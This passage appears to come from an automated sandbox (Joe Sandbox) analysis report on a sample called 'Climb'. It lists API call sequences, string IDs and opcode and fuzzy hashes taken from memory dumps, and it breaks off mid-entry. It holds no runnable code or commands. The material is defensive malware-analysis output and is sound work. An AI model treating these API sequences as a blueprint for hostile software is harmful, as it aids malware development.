                                                                                                                                                                          • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                          • String ID: <$@
                                                                                                                                                                          • API String ID: 146682121-1426351568
                                                                                                                                                                          • Opcode ID: 6df4a8fccf3f0048863ff6e57900138a12439926e9426ef3318dfda6dd7502ab
                                                                                                                                                                          • Instruction ID: 152715db909e21e53eaabfb2fe9dfb65c370e37f1bf412256006042b54c2da68
                                                                                                                                                                          • Opcode Fuzzy Hash: 6df4a8fccf3f0048863ff6e57900138a12439926e9426ef3318dfda6dd7502ab
                                                                                                                                                                          • Instruction Fuzzy Hash: 1C714574A00219DFCB14EF64C494ADEBBB4FF08314F048499E95AAB362DB74EE41CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00117B6D
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00117BA3
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00117BB4
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00117C36
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                          • String ID: DllGetClassObject
                                                                                                                                                                          • API String ID: 753597075-1075368562
                                                                                                                                                                          • Opcode ID: e8b3e2744f172b0678021e5444484077c18908fa75bd409733859753d9f4d6c0
                                                                                                                                                                          • Instruction ID: e6f72806319f4c875e9501f54d7f6c6dc205c370c9c12e5e7af5c628d3e42813
                                                                                                                                                                          • Opcode Fuzzy Hash: e8b3e2744f172b0678021e5444484077c18908fa75bd409733859753d9f4d6c0
                                                                                                                                                                          • Instruction Fuzzy Hash: EA419DB1604205EFDB19CF64D884BDA7BB9EF54310B1080A9AC0A9F385D7B0DA84CBE0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001448D1
                                                                                                                                                                          • IsMenu.USER32(?), ref: 001448E6
                                                                                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0014492E
                                                                                                                                                                          • DrawMenuBar.USER32 ref: 00144941
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 3076010158-4108050209
                                                                                                                                                                          • Opcode ID: 7e643b9f501327217174bfc51a1c6dadc9d028d9f26b37b6ca5dd1c4f2e3ab9b
                                                                                                                                                                          • Instruction ID: 6c76674312f5234f5f69f833696c0fca5e3b284575c19af83846e1b87acd3584
                                                                                                                                                                          • Opcode Fuzzy Hash: 7e643b9f501327217174bfc51a1c6dadc9d028d9f26b37b6ca5dd1c4f2e3ab9b
                                                                                                                                                                          • Instruction Fuzzy Hash: AB412975A01209AFDF10CF55D884AAABBB9FF0A328F044129E9559B260D730AD55DB60
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333
                                                                                                                                                                            • Part of subcall function 001145FD: GetClassNameW.USER32(?,?,000000FF), ref: 00114620
                                                                                                                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 001127B3
                                                                                                                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 001127C6
                                                                                                                                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 001127F6
                                                                                                                                                                            • Part of subcall function 000B8577: _wcslen.LIBCMT ref: 000B858A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                          • API String ID: 2081771294-1403004172
                                                                                                                                                                          • Opcode ID: fd0a6fbd71333443b1f3f7bae3f8e39d5453c3b8b74a1de81e633390e21a8184
                                                                                                                                                                          • Instruction ID: e3e44cc520df4bba00b8d74cc185a89dc6627b5c9d22350f0499beefcebce7af
                                                                                                                                                                          • Opcode Fuzzy Hash: fd0a6fbd71333443b1f3f7bae3f8e39d5453c3b8b74a1de81e633390e21a8184
                                                                                                                                                                          • Instruction Fuzzy Hash: 19210575A00104BFDB09ABA0DC46DFF77B8DF46760F108139F421A71E2DB78498AC660
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00143A29
                                                                                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 00143A30
                                                                                                                                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00143A45
                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00143A4D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                          • String ID: SysAnimate32
                                                                                                                                                                          • API String ID: 3529120543-1011021900
                                                                                                                                                                          • Opcode ID: 5b1424ae8b078c8afd238ae97bb84b2b0dbb4380fb61b76c06bf1603859e9963
                                                                                                                                                                          • Instruction ID: 83e72ab24242fa6ac146f36718f16423de4ef298e29e0861a5e3fa554c5cf6a3
                                                                                                                                                                          • Opcode Fuzzy Hash: 5b1424ae8b078c8afd238ae97bb84b2b0dbb4380fb61b76c06bf1603859e9963
                                                                                                                                                                          • Instruction Fuzzy Hash: 9C219A71640209ABEF108F64EC84FAB77E9EB49368F205228FAA1D31F0C771CD919760
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,000D508E,?,?,000D502E,?,001798D8,0000000C,000D5185,?,00000002), ref: 000D50FD
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000D5110
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,000D508E,?,?,000D502E,?,001798D8,0000000C,000D5185,?,00000002,00000000), ref: 000D5133
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                          • Opcode ID: 3018836647a0c260ab543ff4b4620e695a55858deedf8c62ff792e6c1072f23a
                                                                                                                                                                          • Instruction ID: eba7f3979c755aaa3474d9d88e61fb18c2e327bd56f64efabc111864f30a1e8a
                                                                                                                                                                          • Opcode Fuzzy Hash: 3018836647a0c260ab543ff4b4620e695a55858deedf8c62ff792e6c1072f23a
                                                                                                                                                                          • Instruction Fuzzy Hash: BDF04439A00208BBDB115F94EC49BADBFF5EF08752F0000A5FC09A6660DB755984CA95
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32 ref: 0010E785
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0010E797
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0010E7BD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                          • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                          • API String ID: 145871493-2590602151
                                                                                                                                                                          • Opcode ID: 81b1406694292301f51c109526159953f65148d840013fdc61af1bf16eaaab4b
                                                                                                                                                                          • Instruction ID: 507e13aaa71d5ffeae01c52b7f361e1b8c4fd6a0063bf4737208a9f945ebc9b5
                                                                                                                                                                          • Opcode Fuzzy Hash: 81b1406694292301f51c109526159953f65148d840013fdc61af1bf16eaaab4b
                                                                                                                                                                          • Instruction Fuzzy Hash: 3FE061759025119FEB355760AC88F6D32647F15F01F150998FC81F20A0DBB0CD84CF95
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,000B668B,?,?,000B62FA,?,00000001,?,?,00000000), ref: 000B664A
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000B665C
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,000B668B,?,?,000B62FA,?,00000001,?,?,00000000), ref: 000B666E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                          • API String ID: 145871493-3689287502
                                                                                                                                                                          • Opcode ID: bc3c2f2aba66c5a069707efef76e8115e2b34bedeffd0834be486deb2b2ad93e
                                                                                                                                                                          • Instruction ID: e3d1705a9aa40937362e72b668b3bfabf2c953dde9414872ecf5c60c6350534c
                                                                                                                                                                          • Opcode Fuzzy Hash: bc3c2f2aba66c5a069707efef76e8115e2b34bedeffd0834be486deb2b2ad93e
                                                                                                                                                                          • Instruction Fuzzy Hash: 46E0C23A70262257D6622725BC0CBAE77A89F83F26B050219FD04E2220DFA8CC41C5E5
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,000F5657,?,?,000B62FA,?,00000001,?,?,00000000), ref: 000B6610
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000B6622
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,000F5657,?,?,000B62FA,?,00000001,?,?,00000000), ref: 000B6635
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                          • API String ID: 145871493-1355242751
                                                                                                                                                                          • Opcode ID: 8e37d3081d1639cf2374085d46cbd549476d291ee5fb6388b8c09d10f9632c18
                                                                                                                                                                          • Instruction ID: b7fdcf0f155f694fff21061f275b331dba6ae41c3a8e05fb7d0a604b37cef9ed
                                                                                                                                                                          • Opcode Fuzzy Hash: 8e37d3081d1639cf2374085d46cbd549476d291ee5fb6388b8c09d10f9632c18
                                                                                                                                                                          • Instruction Fuzzy Hash: 6FD05B39612531578A7227297C18ACF7B549FD3F113050055FC04A2334CF65CD41CADD
                                                                                                                                                                          APIs
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001235C4
                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00123646
                                                                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0012365C
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0012366D
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0012367F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Delete$Copy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3226157194-0
                                                                                                                                                                          • Opcode ID: eb76e4aee50d67fdebed876f0c4979ae7cc632c856b7ce4f209ad1ce5e5916dd
                                                                                                                                                                          • Instruction ID: 3a826ee39526c9f3d8f67811f6d8e1f4de0b078c01a65a70337d1725acd7c506
                                                                                                                                                                          • Opcode Fuzzy Hash: eb76e4aee50d67fdebed876f0c4979ae7cc632c856b7ce4f209ad1ce5e5916dd
                                                                                                                                                                          • Instruction Fuzzy Hash: 8FB17F72E00229ABDF15DBA4DC85EDEBB7CEF48300F0040A6F519A6252EB359B548B60
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 0013AE87
                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0013AE95
                                                                                                                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0013AEC8
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0013B09D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3488606520-0
                                                                                                                                                                          • Opcode ID: 93cd474d5e7eb431f4ddd96f9e4d5d60787da68658cc5d67582522ba829368ca
                                                                                                                                                                          • Instruction ID: 0543ce88d21f1abacbfdf56645e7d22ab7941af76eab0f9f9985cc5dac8714f9
                                                                                                                                                                          • Opcode Fuzzy Hash: 93cd474d5e7eb431f4ddd96f9e4d5d60787da68658cc5d67582522ba829368ca
                                                                                                                                                                          • Instruction Fuzzy Hash: 65A19FB1A04301AFE724DF24C886FAAB7E5AF44710F54885DF5A99B293DB71EC41CB81
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333
                                                                                                                                                                            • Part of subcall function 0013D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013C10E,?,?), ref: 0013D415
                                                                                                                                                                            • Part of subcall function 0013D3F8: _wcslen.LIBCMT ref: 0013D451
                                                                                                                                                                            • Part of subcall function 0013D3F8: _wcslen.LIBCMT ref: 0013D4C8
                                                                                                                                                                            • Part of subcall function 0013D3F8: _wcslen.LIBCMT ref: 0013D4FE
                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0013C505
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0013C560
                                                                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0013C5C3
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?), ref: 0013C606
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0013C613
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 826366716-0
                                                                                                                                                                          • Opcode ID: c1b2d14f6c74d7f24ca2e282a2d40358255ea417fc9c270b5e00e50a1210c014
                                                                                                                                                                          • Instruction ID: 91283dbb768ec21517e9d3934eb916059b2519f01b7823567c9ae6e595b83641
                                                                                                                                                                          • Opcode Fuzzy Hash: c1b2d14f6c74d7f24ca2e282a2d40358255ea417fc9c270b5e00e50a1210c014
                                                                                                                                                                          • Instruction Fuzzy Hash: 4761B371208241EFD714DF24C894E6ABBE5FF84308F54859CF4999B2A2DB31ED46CB91
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0011E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0011D7CD,?), ref: 0011E714
                                                                                                                                                                            • Part of subcall function 0011E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0011D7CD,?), ref: 0011E72D
                                                                                                                                                                            • Part of subcall function 0011EAB0: GetFileAttributesW.KERNEL32(?,0011D840), ref: 0011EAB1
                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0011ED8A
                                                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0011EDC3
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0011EF02
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0011EF1A
                                                                                                                                                                          • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0011EF67
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3183298772-0
                                                                                                                                                                          • Opcode ID: 5b88f488f2b533b55c897149b422978c4d970a49f146be0ce89531c1913f2733
                                                                                                                                                                          • Instruction ID: 55cfd6e69d147a7df1c5fcb6f19aaed58a31de9aeaec44e0cddc9790c7c75f10
                                                                                                                                                                          • Opcode Fuzzy Hash: 5b88f488f2b533b55c897149b422978c4d970a49f146be0ce89531c1913f2733
                                                                                                                                                                          • Instruction Fuzzy Hash: 4C5153B25083859BC728DBA4D8919DFB3ECAF94300F40093EF585D3192EF75A6C88766
                                                                                                                                                                          APIs
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00119534
                                                                                                                                                                          • VariantClear.OLEAUT32 ref: 001195A5
                                                                                                                                                                          • VariantClear.OLEAUT32 ref: 00119604
                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00119677
                                                                                                                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 001196A2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4136290138-0
                                                                                                                                                                          • Opcode ID: 9d14abe41984458ab85c3cfc020c33de269e112ea973fddb08ea358f40a1c6ac
                                                                                                                                                                          • Instruction ID: 89c74a81b7d8b785298001080d6996acad1aae6c294eb586863b1f05c6452037
                                                                                                                                                                          • Opcode Fuzzy Hash: 9d14abe41984458ab85c3cfc020c33de269e112ea973fddb08ea358f40a1c6ac
